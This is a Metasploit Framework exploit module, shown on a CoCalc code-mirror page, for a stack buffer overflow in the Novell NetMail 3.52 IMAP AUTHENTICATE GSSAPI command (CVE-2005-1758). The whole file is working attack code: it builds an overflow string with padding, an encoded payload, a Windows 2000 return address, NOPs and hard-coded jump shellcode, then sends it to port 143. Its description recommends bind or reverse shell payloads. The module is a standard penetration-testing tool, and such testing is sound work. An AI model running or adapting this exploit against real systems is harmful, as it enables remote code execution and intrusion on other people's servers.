Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/novell_netmail_auth.rb
31189 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE

18
          GSSAPI command. By sending an overly long string, an attacker can overwrite the

19
          buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp

20
          or windows/shell_reverse_tcp allows for the most reliable results.

21
        },

22
        'Author' => [ 'MC' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2005-1758' ],

26
          [ 'OSVDB', '55175' ]

27
        ],

28
        'Privileged' => true,

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'thread',

31
          'AllowWin32SEH' => true

32
        },

33
        'Payload' => {

34
          'Space' => 850,

35
          'BadChars' => "\x00\x20\x2c\x3a\x40",

36
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",

37
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],

42
        ],

43
        'DisclosureDate' => '2007-01-07',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options([ Opt::RPORT(143) ])

54
  end

55


56
  def exploit

57
    connect

58
    sock.get_once

59


60
    jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"

61
    jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"

62
    jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

63


64
    sploit = "A001 AUTHENTICATE GSSAPI\r\n"

65
    sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"

66
    sploit << rand_text_alpha_upper(2) + [target.ret].pack('V')

67
    sploit << make_nops(8) + jmp + rand_text_alpha_upper(700)

68


69
    print_status("Trying target #{target.name}...")

70
    sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")

71


72
    handler

73
    disconnect

74
  end

75
end

76


77